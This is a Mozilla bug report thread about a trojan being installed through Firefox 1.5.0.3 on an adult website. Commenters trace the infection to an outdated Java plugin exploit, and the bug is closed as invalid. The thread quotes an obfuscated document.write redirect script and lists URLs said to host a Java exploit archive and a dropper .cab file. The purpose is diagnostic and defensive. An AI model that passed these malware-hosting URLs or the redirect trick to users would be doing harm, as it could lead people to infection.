Closed
Bug 337768
Opened 18 years ago
Closed 18 years ago
Active exploit that installs trojan on ff 1.5.3
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: rene, Unassigned)
References
()
Details
Attachments
(1 file)
24.20 KB,
text/html
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 Navigating to this URL with ff 1.5.3 will install one or multiple trojans, reason unknown but virusscanner alerts, placing arbitrary executables in \windows\system32 directory. It redirects the user before or afterwards. Reproducable on my system. Reproducible: Always Steps to Reproduce: 1. navigate to http://c-erotica.cumswap.net/ with ff 1.5.3 2. watch your virusscanner detect trojans. 3. Actual Results: AVG pops up offering to quarantaine the trojan. Expected Results: - Accidental discovery, reproducable.
Comment 1•18 years ago
|
||
page loads: http://teenboat.sexy-teen-girls-free-porn-pics.biz/src.js contains: document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%3E%0D%0A%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%2D%6F%72%67%61%73%6D%2E%6F%72%67%2F%73%65%78%2E%68%74%6D%6C%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A')) decodes as: <script language='javascript'> window.location.href="http://www.e-orgasm.org/sex.html"; </script>
Reporter | ||
Comment 2•18 years ago
|
||
Agreed, trojan also installs when going to http://www.e-orgasm.org/sex.html I've made a log with ethereal, not sure where to put it.
Comment 3•18 years ago
|
||
René, can you type about:plugins into the url bar, do File->Save Page As (Web Page Complete), then attach the page here? thanks.
Reporter | ||
Comment 4•18 years ago
|
||
as requested
Comment 5•18 years ago
|
||
what are the name of the trojans?
Comment 6•18 years ago
|
||
windows defender didn't catch anything after loading http://www.e-orgasm.org/sex.html in the test I just ran.
Comment 7•18 years ago
|
||
According to the attachment in comment 4, you're using Java 1.4.1_03. Bug 271559, filed in 2004, mentions active exploits against Java versions lower than 1.4.2_06. I bet the site is exploiting a security hole in the old version of Java you have. If you're feeling brave, want to disable/uninstall Java and try again, or update your Java VM and try again?
Comment 8•18 years ago
|
||
René, actually most of your plugins are out of date and have been superceded by later versions which incorporate fixes for security issues. Please update _all of your plugins_ as soon as possible, clean your system and try again.
Reporter | ||
Comment 9•18 years ago
|
||
Hi, Well, i have 5 extensions installed (DOM Inspector, Talkback, Adblock, Stumbleupon, Live HTTP Headers). StumbleUpon was indeed out of date, i upgraded. I checked system with hitman pro, AVG is running, system should be clean. Trojan horse name (one of them) is Dropper.Small.8.BT according to AVG.
Comment 10•18 years ago
|
||
Actually, I meant plugins. Hopefully I am up to date. To compare yours with mine: yours: QuickTime Plug-in 7.0.3 mine: QuickTime Plug-in 7.0.4 yours: Real 6.0.12.1465 mine: Real 6.0.12.1483 yours: Shockwave Flash 8.0 r22 mine: Shockwave Flash 8.0 r24 yours: Java Plug-in 1.4.1_03 mine: Java Plug-in 1.5.0_06
Comment 11•18 years ago
|
||
crap, QuickTime 7.0.4 is now out of date, get the latest 7.1 from <http://www.apple.com/support/downloads/>.
Comment 12•18 years ago
|
||
www.e-orgasm.org/sex.html loads attemps lots of crap, which is generally how these "free" sites pay for themselves. Are you confident you can stay ahead of the hackers? Note that Anti-Virus won't save you: they only detect the bad stuff they've already discovered, which by definition means there's a window of time when the bad guys start using a new trick and when the AV products start detecting it. One thing it loads is detected as Trojan.ByteVerify (an old Java exploit, almost guaranteed to be present on these kinds of sites) http://www.awmdabest.com/tjar/364/ns/archive.jar It also includes a script from http://install.xxxtoolbar.com/ that tries tons of tricks, mostly IE. Starting with a simple plea "Clean OK then Yes to Install" http://www.tbcode.com/ist/softwares/v4.0/0006_regular.cab -- no other reason given, just to see how gullible people are I guess. xxxtoolbar.com has a flash movie called toolbarcash.swf with the associated text "For Easy Installation of SlotchBar". It scans clean, but I didn't run it to see what it tried to load into the associated iframe. a couple more attempts run the tbcode.com active x from above. Loads an adultfriendfinder.com frame which looked safe as far as I could tell. heh: "The individuals appearing in this advertisement may not be actual Adult FriendFinder members." I'm sure they're not. This looks like the old Java exploit (which is a downloader, the actual payload differs from site to site). I'm slightly suspicious of the flash since that's going around too, but this particular one seemed to scan clean.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Depends on: startpagewarning
Resolution: --- → INVALID
Reporter | ||
Comment 13•18 years ago
|
||
Disabling Java indeed stops the system from being infected. An outdated java probably is the vector. Which makes me wondering.. I am one of the users that nicely applies when some software mention there is a new version, and have done so in the past several times for java. But.. at this very moment, java (even when loaded with ff) does not mention an update, btw neither does flash or qt. I am not sure how this mechanism is supposed to work, (ie will the autoupdate only get triggered with ff running and having the plugin loaded?), and worse, i cannot find _any_ option to manually update java, since it is not in the start menu, the traybar icon that shows up after running some java app isn't of help either, ff menu does not show some plugin config or 'check for updates' (besides the extensions) so apparently i am dependent on the auto-update mechanism of the plugin author?... So, what steps were actually expected from me, as user, to fix or prevent this, i am obviously missing something here. So far, my best solution is to just disable java.
Reporter | ||
Comment 14•18 years ago
|
||
An addition to this java thing, according to control panel/software J2SE RE 5.0 update 6 (1.5.0_06, right?) is nicely installed. J2SE 1.4.1 seems _not_ installed, however that appears the version launched with ff. I have updated ff in the past, several times, so probably this java 1.4 just kept "sleeping" I went to ff_install_dir\plugins\ and removed any dll that had to do with java. After ff restart, indeed now java 1.5 is launched (and the issue solved). So after all, the issue appears to be: java 1.4 plugin hanging around with ff, even after uninstall(?), and getting launched by default even if java 1.5 is installed. Should i file a new bug report for that? ;) Many thanks for the help from you guys, and i am glad it was not ff itself.
Comment 15•18 years ago
|
||
Looking at your plugin list it appears you have both Java 1.4.1_03 and Java 1.5.0_06 installed. I wonder if the Java 1.5.0 installer didn't clean out the old plugin version from Firefox's installation directory. That is not good.
Reporter | ||
Comment 16•18 years ago
|
||
Well, java 1.5.0_06 is not in the plugins directory, i looked for it and the dll's (same named as the 1.41 ones i dropped from plugin dir) are in "program files\java\jre1.5.0_06\bin". Not sure how ff detects this, but i _think_ putting them in plugins dir was old method, looking into registry for java location is new method. And, (i think) plugins in ff plugin directory apparently get priority above java installation in other directory. My current system is about 10 months old, afaik it only ran ff 1.0 and up, not 0.9.
You need to log in
before you can comment on or make changes to this bug.
Description
•